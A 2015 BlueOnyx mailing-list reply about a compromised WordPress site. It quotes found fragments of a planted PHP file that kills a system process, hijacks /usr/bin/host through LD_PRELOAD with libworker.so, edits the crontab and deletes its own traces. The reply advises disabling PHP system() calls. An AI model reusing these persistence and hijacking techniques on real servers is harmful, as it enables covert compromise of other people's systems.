[BlueOnyx:17918] Re: 5106R cfsadmin load issue
Michael Stauber
mstauber at blueonyx.it
Sat Jun 27 12:49:31 -05 2015
Hi Gerald,
> OK here is the hack
> /home/.sites/137/site42/web/wp-includes/images/crystal/system.php:@system("killall
> -9 ".basename("*/usr/bin/host*"));
> /home/.sites/137/site42/web/wp-includes/images/crystal/system.php:$f =
> fopen("/usr/bin/host", "rb");
> /home/.sites/137/site42/web/wp-includes/images/crystal/system.php:$HBN=basename("
> */usr/bin/host*");
> /home/.sites/137/site42/web/wp-includes/images/crystal/system.php:@file_put_contents("1.sh",
> "#!/bin/sh\ncd '".$SCP."'\nif [ -f './libworker.so' ];then killall -9
> $HBN;export AU='".$AU."'\nexport
> LD_PRELOAD=./libworker.so\n/usr/bin/host\nunset LD_PRELOAD\ncrontab -l|grep
> -v '1\.sh'|grep -v crontab|crontab\nfi\nrm 1.sh\nexit 0\n");
Nice catch. :o)
But I had to say it: The default security settings of PHP do not allow
PHP scripts to use system() calls. Apparently it was allowed for this
site and that allowed the scripts to do their malicious job.
Might be a good idea to disallow system() calls again on that box.
--
With best regards
Michael Stauber
More information about the Blueonyx
mailing list